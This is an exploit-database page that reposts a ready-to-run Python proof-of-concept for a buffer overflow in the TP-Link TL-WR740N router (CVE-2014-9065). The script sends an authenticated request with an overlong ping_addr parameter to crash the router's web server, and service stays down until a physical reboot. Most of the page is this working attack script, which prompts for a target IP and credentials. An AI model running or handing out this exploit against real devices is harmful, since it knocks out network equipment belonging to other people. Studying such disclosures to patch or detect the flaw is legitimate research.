Advertisement






TP-Link TL-WR740N Buffer Overflow / Denial Of Service

CVE Category Price Severity
CVE-2014-9065 CWE-119 $1500 High
Author Risk Exploitation Type Date
Unknown High Remote 2024-03-11
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030025

Below is a copy:

TP-Link TL-WR740N Buffer Overflow / Denial Of Service
# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
# Date: 8/12/2023
# Exploit Author: Anish Feroz (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N

#Description:

#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.

#Usage:

#python3 target username password
#change port, if required

------------------------------------------------POC-----------------------------------------

#!/usr/bin/python

import requests
from requests.auth import HTTPBasicAuth
import base64

def send_request(ip, username, password):
    auth_url = f"http://{ip}:8082"
    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"

    credentials = f"{username}:{password}"
    encoded_credentials = base64.b64encode(credentials.encode()).decode()

    headers = {
        "Host": f"{ip}:8082",
        "Authorization": f"Basic {encoded_credentials}",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }

    session = requests.Session()
    
    response = session.get(target_url, headers=headers)

    if response.status_code == 200:
        print("Server Crashed")
        print(response.text)
    else:
        print(f"Script Completed with status code {response.status_code}")

ip_address = input("Enter IP address of the host: ")
username = input("Enter username: ")
password = input("Enter password: ")

send_request(ip_address, username, password)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum